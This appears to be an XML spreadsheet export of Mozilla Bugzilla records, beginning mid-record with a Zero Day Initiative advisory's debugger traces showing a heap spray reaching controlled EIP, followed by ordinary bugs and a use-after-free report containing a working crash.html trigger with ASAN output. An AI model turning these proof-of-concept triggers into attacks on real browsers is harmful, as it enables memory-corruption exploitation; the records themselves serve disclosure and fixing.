00b1f188 636f9937 00000000 10513920 00b1f5f0 mozjs!Interpret+0x5a5e (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\interpreter.cpp @ 1714]
00b1f478 636f9c16 0c1e2e40 00000000 00b1f4e8 mozjs!js::Invoke+0x1317 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\interpreter.cpp @ 495]
00b1f52c 6374fa71 0c1e2e40 00b1f680 00b1f5c0 mozjs!js::Invoke+0x216 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\interpreter.cpp @ 532]
00b1f554 60431727 0c1e2e40 00b1f680 00b1f5c0 mozjs!JS::Call+0x21 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\jsapi.cpp @ 4916]
00b1f640 60449ff2 0355d4a0 00b1f680 0adb1b98 xul!mozilla::dom::Function::Call+0x107 (FPO: [4,50,4]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dom\bindings\functionbinding.cpp @ 35]
00b1f744 605836db 00b1f780 0adb1b98 00b1f798 xul!mozilla::dom::Function::Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt;+0xc2 (FPO: [3,56,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dist\include\mozilla\dom\functionbinding.h @ 58]
00b1f84c 6057fc91 0c578080 0d42ac40 00b1f8dc xul!nsGlobalWindow::RunTimeoutHandler+0x11b (FPO: [1,60,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\base\nsglobalwindow.cpp @ 11877]
00b1f8bc 6042c630 0d42ac40 08d4a200 6042c5ec xul!nsGlobalWindow::RunTimeout+0x2d1 (FPO: [1,23,4]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\base\nsglobalwindow.cpp @ 12102]
00b1f8dc 6056ba67 08d4a200 0d42ac40 0351b240 xul!nsGlobalWindow::TimerCallback+0x44 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\base\nsglobalwindow.cpp @ 12347]
00b1f8f8 6056bbe4 604e6207 0a18f1f0 00b1f9b8 xul!nsTimerImpl::Fire+0xc7 (FPO: [0,1,4]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\threads\nstimerimpl.cpp @ 551]
00b1f8fc 604e6207 0a18f1f0 00b1f9b8 0350e9b0 xul!nsTimerEvent::Run+0x14 (FPO: [1,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\threads\nstimerimpl.cpp @ 637]
00b1f97c 604c8b1d 0351b201 00000001 00b1f994 xul!nsThread::ProcessNextEvent+0x3b7 (FPO: [3,26,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\threads\nsthread.cpp @ 694]
00b1f98c 606c5e1d 0351b201 00000001 0352e360 xul!NS_ProcessNextEvent+0x2d (FPO: [2,0,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\glue\nsthreadutils.cpp @ 263]
00b1f9b8 606b9440 0052e360 bcab8a31 0351b240 xul!mozilla::ipc::MessagePump::Run+0x9b (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\glue\messagepump.cpp @ 136]
00b1f9f0 606b94cf 0351bbe0 00000001 00b1fa00 xul!MessageLoop::RunHandler+0x51 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_loop.cc @ 220]
00b1fa10 60618a5e 80000000 088315c0 6061fbaf xul!MessageLoop::Run+0x19 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_loop.cc @ 194]
00b1fa1c 6061fbaf 0351bbe0 60be25cf 0351bbe0 xul!nsBaseAppShell::Run+0x2c (FPO: [1,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\xpwidgets\nsbaseappshell.cpp @ 166]
00b1fa30 605a9c2a 088315c0 721c1306 00b1fb44 xul!nsAppShell::Run+0x19 (FPO: [1,0,4]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\windows\nsappshell.cpp @ 165]
00b1fb04 606072c6 00b1fb44 00b1fc6c 00b1fb44 xul!XREMain::XRE_mainRun+0x453 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4010]
00b1fb24 60620d14 00b1fb44 00000000 024f2ff8 xul!XREMain::XRE_main+0xe8 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4079]
00b1fc3c 013616dd 00000001 024f2ff8 00b1fc6c xul!XRE_main+0x30 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4291]
00b1fdd0 013619a2 00000001 024f2ff8 0351e0a0 firefox!do_main+0x283 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\browser\app\nsbrowserapp.cpp @ 282]
00b1fe64 01361aad 00000001 024f2ff8 00000000 firefox!NS_internal_main+0x11d (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\browser\app\nsbrowserapp.cpp @ 643]
00b1fe98 0136237b 00000000 00f63f98 00f67f70 firefox!wmain+0xf0 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nswindowswmain.cpp @ 112]
00b1fedc 75ec17ad 7fccd000 00b1ff2c 7779db0e firefox!__tmainCRTStartup+0x122 (FPO: [Non-Fpo]) (CONV: cdecl) [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 552]
00b1fee8 7779db0e 7fccd000 b83c25bc 00000000 KERNEL32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
00b1ff2c 7779dae7 ffffffff 777e4b0e 00000000 ntdll!__RtlUserThreadStart+0x20 (FPO: [Non-Fpo])
00b1ff3c 00000000 0136249c 7fccd000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])
0:000&gt; !lmi mozjs
Loaded Module Info: [mozjs] 
         Module: mozjs
   Base Address: 63650000
     Image Name: C:\Program Files\Mozilla Firefox\mozjs.dll
   Machine Type: 332 (I386)
     Time Stamp: 53912a18 Thu Jun 05 19:40:24 2014
           Size: 3b6000
       CheckSum: 3ad3a7
Characteristics: 2122  
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    6f, 370168,  36f368 RSDS - GUID: {D312FB30-1992-4BDF-8364-B3FB1E13E7ED}
               Age: 2, Pdb: c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\js\src\mozjs.pdb
     Image Type: FILE     - Image read successfully from debugger.
                 C:\Program Files\Mozilla Firefox\mozjs.dll
    Symbol Type: PDB      - Symbols loaded successfully from symbol server.
                 z:\export\symbols\mozjs.pdb\D312FB3019924BDF8364B3FB1E13E7ED2\mozjs.pdb
       Compiler: Linker - front end [0.0 bld 0] - back end [10.0 bld 30319]
    Load Report: private symbols &amp; lines, source indexed 
                 z:\export\symbols\mozjs.pdb\D312FB3019924BDF8364B3FB1E13E7ED2\mozjs.pdb
0:000&gt; lmvm mozjs
start    end        module name
63650000 63a06000   mozjs      (private pdb symbols)  z:\export\symbols\mozjs.pdb\D312FB3019924BDF8364B3FB1E13E7ED2\mozjs.pdb
    Loaded symbol image file: C:\Program Files\Mozilla Firefox\mozjs.dll
    Image path: C:\Program Files\Mozilla Firefox\mozjs.dll
    Image name: mozjs.dll
    Timestamp:        Thu Jun 05 19:40:24 2014 (53912A18)
    CheckSum:         003AD3A7
    ImageSize:        003B6000
    Translations:     0000.04b0 0000.04e4 0409.04b0 0409.04e4
0:000&gt; !lmi xul
Loaded Module Info: [xul] 
         Module: xul
   Base Address: 60380000
     Image Name: C:\Program Files\Mozilla Firefox\xul.dll
   Machine Type: 332 (I386)
     Time Stamp: 539141b1 Thu Jun 05 21:21:05 2014
           Size: 1826000
       CheckSum: 16e4463
Characteristics: 2122  
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    76, 14afff8, 14af3f8 RSDS - GUID: {0B4EEB73-D3AE-4584-B127-6A3931531AD3}
               Age: 2, Pdb: c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\toolkit\library\xul.pdb
     Image Type: FILE     - Image read successfully from debugger.
                 C:\Program Files\Mozilla Firefox\xul.dll
    Symbol Type: PDB      - Symbols loaded successfully from symbol server.
                 z:\export\symbols\xul.pdb\0B4EEB73D3AE4584B1276A3931531AD32\xul.pdb
       Compiler: Linker - front end [0.0 bld 0] - back end [10.0 bld 30319]
    Load Report: private symbols &amp; lines, source indexed 
                 z:\export\symbols\xul.pdb\0B4EEB73D3AE4584B1276A3931531AD32\xul.pdb
0:000&gt; lmvm xul
start    end        module name
60380000 61ba6000   xul        (private pdb symbols)  z:\export\symbols\xul.pdb\0B4EEB73D3AE4584B1276A3931531AD32\xul.pdb
    Loaded symbol image file: C:\Program Files\Mozilla Firefox\xul.dll
    Image path: C:\Program Files\Mozilla Firefox\xul.dll
    Image name: xul.dll
    Timestamp:        Thu Jun 05 21:21:05 2014 (539141B1)
    CheckSum:         016E4463
    ImageSize:        01826000
    File version:     30.0.0.5269
    Product version:  30.0.0.5269
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Foundation
    ProductName:      Firefox
    InternalName:     Firefox
    OriginalFilename: Firefox
    ProductVersion:   30.0
    FileVersion:      30.0
    FileDescription:  30.0
    LegalCopyright:   License: MPL 2
    LegalTrademarks:  Mozilla
    Comments:         Mozilla
When the spray lands properly:
(94.f60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=c1c2c3c4 ebx=0c0c0000 ecx=0b7fdce0 edx=0b7fdce0 esi=0b7fdce0 edi=0c0c0000
eip=c1c2c3c4 esp=00f9dcd8 ebp=00f9dd04 iopl=0         ov up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010a06
c1c2c3c4 ??              ???
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   regenrecht working with HP's Zero Day Initiative</t>
        </is>
      </c>
      <c r="X5398" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5399">
      <c r="A5399" t="n">
        <v>15980</v>
      </c>
      <c r="B5399" t="inlineStr">
        <is>
          <t>1999-10-10 02:58:23 -0700</t>
        </is>
      </c>
      <c r="C5399" t="inlineStr">
        <is>
          <t>Password shown in the Location-bar and in html</t>
        </is>
      </c>
      <c r="D5399" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E5399" t="n">
        <v>1</v>
      </c>
      <c r="F5399" t="n">
        <v>1</v>
      </c>
      <c r="G5399" t="n">
        <v>4</v>
      </c>
      <c r="H5399" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5399" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5399" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5399" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5399" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5399" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5399" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5399" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5399" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
      <c r="Q5399" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5399" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5399" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T5399" t="n">
        <v>1</v>
      </c>
      <c r="U5399" t="n">
        <v>4</v>
      </c>
      <c r="V5399" t="n">
        <v>40</v>
      </c>
      <c r="W5399" t="inlineStr">
        <is>
          <t>If you enter bugzilla the first time and enter your account information, it is
displayed in the location-bar during the rest of the bugzilla-session.
While my Bugzilla-account isn't exactly critical, i use my standard-password
here, so people standing next to me could easily see the password and use it for
various of my accounts.</t>
        </is>
      </c>
      <c r="X5399" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5400">
      <c r="A5400" t="n">
        <v>62754</v>
      </c>
      <c r="B5400" t="inlineStr">
        <is>
          <t>2000-12-13 09:26:37 -0800</t>
        </is>
      </c>
      <c r="C5400" t="inlineStr">
        <is>
          <t>Regression: META charset ignored</t>
        </is>
      </c>
      <c r="D5400" t="inlineStr">
        <is>
          <t>2001-01-05 03:06:26 -0800</t>
        </is>
      </c>
      <c r="E5400" t="n">
        <v>1</v>
      </c>
      <c r="F5400" t="n">
        <v>1</v>
      </c>
      <c r="G5400" t="n">
        <v>3</v>
      </c>
      <c r="H5400" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5400" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5400" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K5400" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5400" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5400" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5400" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5400" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5400" t="inlineStr">
        <is>
          <t>Fix in hand</t>
        </is>
      </c>
      <c r="Q5400" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5400" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5400" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5400" t="n">
        <v>1</v>
      </c>
      <c r="U5400" t="n">
        <v>0</v>
      </c>
      <c r="V5400" t="n">
        <v>31</v>
      </c>
      <c r="W5400" t="inlineStr">
        <is>
          <t>seen on commercial builds:
windows 2000-12-13-06-Mtrunk
linux 2000-12-13-03-Mtrunk
mac 2000-12-13-04-Mtrunk
many language sets on these pages are viewing incorrectly with odd symbols and 
signs</t>
        </is>
      </c>
      <c r="X5400" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5401">
      <c r="A5401" t="n">
        <v>679588</v>
      </c>
      <c r="B5401" t="inlineStr">
        <is>
          <t>2011-08-16 20:05:44 -0700</t>
        </is>
      </c>
      <c r="C5401" t="inlineStr">
        <is>
          <t>Intermittent browser_select_update.js or browser_select_confirm.js or browser_select_selection.js | Test timed out followed by | Found a  after previous test timed out</t>
        </is>
      </c>
      <c r="D5401" t="inlineStr">
        <is>
          <t>2013-06-11 05:48:35 -0700</t>
        </is>
      </c>
      <c r="E5401" t="n">
        <v>1</v>
      </c>
      <c r="F5401" t="n">
        <v>1</v>
      </c>
      <c r="G5401" t="n">
        <v>3</v>
      </c>
      <c r="H5401" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5401" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5401" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K5401" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5401" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5401" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5401" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5401" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P5401" t="inlineStr"/>
      <c r="Q5401" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5401" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5401" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T5401" t="n">
        <v>1</v>
      </c>
      <c r="U5401" t="n">
        <v>0</v>
      </c>
      <c r="V5401" t="n">
        <v>599</v>
      </c>
      <c r="W5401" t="inlineStr">
        <is>
          <t>No, that's not a typo. I don't know what you're leaving behind, and apparently neither does the harness, because the message is "Found a  after".
http://tbpl.allizom.org/php/getParsedLog.php?id=5994132#error1
TEST-INFO | chrome://mochitests/content/browser/toolkit/mozapps/extensions/test/browser/browser_select_update.js | Longer timeout required, waiting longer...  Remaining timeouts: 1
TEST-UNEXPECTED-FAIL | chrome://mochitests/content/browser/toolkit/mozapps/extensions/test/browser/browser_select_update.js | Test timed out
(screenshot)
INFO TEST-END | chrome://mochitests/content/browser/toolkit/mozapps/extensions/test/browser/browser_select_update.js | finished in 3000099ms
TEST-INFO | checking window state
TEST-UNEXPECTED-FAIL | chrome://mochitests/content/browser/toolkit/mozapps/extensions/test/browser/browser_select_update.js | Found a  after previous test timed out
TEST-INFO | unknown test url | before wait for focus -- loaded: complete active window: &lt;no window active&gt; focused window: &lt;no window focused&gt; desired window: ([object ChromeWindow]) chrome://browser/content/browser.xul child window: ([object Window]) about:blank docshell visible: true</t>
        </is>
      </c>
      <c r="X5401" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5402">
      <c r="A5402" t="n">
        <v>1314442</v>
      </c>
      <c r="B5402" t="inlineStr">
        <is>
          <t>2016-11-01 14:51:47 -0700</t>
        </is>
      </c>
      <c r="C5402" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsTextEditorState::SetValue</t>
        </is>
      </c>
      <c r="D5402" t="inlineStr">
        <is>
          <t>2024-05-30 09:22:49 -0700</t>
        </is>
      </c>
      <c r="E5402" t="n">
        <v>1</v>
      </c>
      <c r="F5402" t="n">
        <v>1</v>
      </c>
      <c r="G5402" t="n">
        <v>3</v>
      </c>
      <c r="H5402" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5402" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5402" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K5402" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5402" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5402" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5402" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5402" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5402" t="inlineStr">
        <is>
          <t>[adv-main50.1+][adv-esr45.6+]</t>
        </is>
      </c>
      <c r="Q5402" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5402" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5402" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T5402" t="n">
        <v>1</v>
      </c>
      <c r="U5402" t="n">
        <v>0</v>
      </c>
      <c r="V5402" t="n">
        <v>18</v>
      </c>
      <c r="W5402" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox (BuildID=20161101133138) as follows:
crash.html:
&lt;script&gt;
function start() {
        o21=document.createElement('body');
        o63=document.createElement('input');
        document.documentElement.appendChild(o63);
        document.body=o21;
        o63.setSelectionRange(6,1,'forward');
        document.designMode='on';
        o21.addEventListener('DOMSubtreeModified',f1);
        o63.value='0';
}
function f1() {
        o63.type='url';
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==18411==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000855a8 at pc 0x7fb30268522f bp 0x7fff6480baf0 sp 0x7fff6480bae8
READ of size 8 at 0x60e0000855a8 thread T0 (Web Content)
    #0 0x7fb30268522e in operator bool /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:750:45
    #1 0x7fb30268522e in nsTextEditorState::SetValue(nsAString_internal const&amp;, unsigned int) /home/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:2199
    #2 0x7fb3024b794a in mozilla::dom::HTMLInputElement::SetValueInternal(nsAString_internal const&amp;, unsigned int) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3267:14
    #3 0x7fb3024c5851 in mozilla::dom::HTMLInputElement::SetValue(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1994:9
    #4 0x7fb301bee5a7 in mozilla::dom::HTMLInputElementBinding::set_value(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLInputElement*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:2258:3
    #5 0x7fb301e5d603 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2825:8
    #6 0x7fb3081a456c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #7 0x7fb3081a456c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #8 0x7fb3081a6888 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #9 0x7fb3081a6888 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:649
    #10 0x7fb30820f6ee in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2419:10
    #11 0x7fb30820f6ee in js::NativeSetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::QualifiedBool, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2454
    #12 0x7fb30817d574 in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1550:12
    #13 0x7fb30817d574 in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:258
    #14 0x7fb30817d574 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2715
    #15 0x7fb308169a33 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #16 0x7fb3081a4d84 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #17 0x7fb3081a57f2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #18 0x7fb307c75c0d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2827:12
    #19 0x7fb30188f93f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #20 0x7fb3022a9981 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #21 0x7fb3022a9981 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #22 0x7fb302275bbd in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
    #23 0x7fb30227717f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #24 0x7fb3022617b6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #25 0x7fb302265883 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #26 0x7fb304427e55 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1001:7
    #27 0x7fb3051aa82e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7554:5
    #28 0x7fb3051a66a4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7358:7
    #29 0x7fb3051adbcf in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7255:13
    #30 0x7fb2ff2d3f40 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #31 0x7fb2ff2d2f08 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #32 0x7fb2ff2cfcbc in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #33 0x7fb2ff2d1d94 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #34 0x7fb2ff2d291c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #35 0x7fb2fd709e3b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #36 0x7fb300284ecf in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8597:7
    #37 0x7fb30031946f in nsUnblockOnloadEvent::Run() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8550:5
    #38 0x7fb2fd531c4b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1175:7
    #39 0x7fb2fd5b21bc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #40 0x7fb2fe300a1f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #41 0x7fb2fe273858 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #42 0x7fb2fe273858 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #43 0x7fb2fe273858 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #44 0x7fb303b43daf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #45 0x7fb305cbe5a7 in XRE_RunAppShell /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:869:12
